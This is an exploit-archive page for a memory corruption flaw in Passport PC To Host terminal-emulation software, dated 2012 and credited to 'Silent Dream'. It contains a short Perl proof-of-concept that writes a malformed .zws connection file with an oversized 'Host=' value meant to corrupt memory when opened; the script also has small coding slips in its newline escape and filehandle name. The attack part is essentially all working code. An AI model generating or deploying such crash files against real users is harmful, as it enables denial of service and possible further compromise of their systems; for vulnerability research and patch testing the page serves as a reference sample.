[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Passport PC To Host Malformed .zws file Memory Corruption Vulnerability
# Published : 2012-03-03
# Author :
# Previous Title : Nokia PC Suite Video Manager 7.1.180.64 (.mp4) Denial of Service
# Next Title : OpenSSL ASN1 BIO Memory Corruption Vulnerability


# Exploit Title: Passport PC To Host Malformed .zws file Memory Corruption
# Date: 3-3-12
# Author: Silent Dream
# Software Link: http://www.zephyrcorp.com/terminal-emulation/
# Version: Latest (2011-506-S)
# Tested on: Windows XP SP3

my $file = "passport_pwn.zws";
my $head = "[Connection]nHost=";
my $junk = "a" x 150;
open($File, ">$file");
print $File $head.$junk;
close($FILE);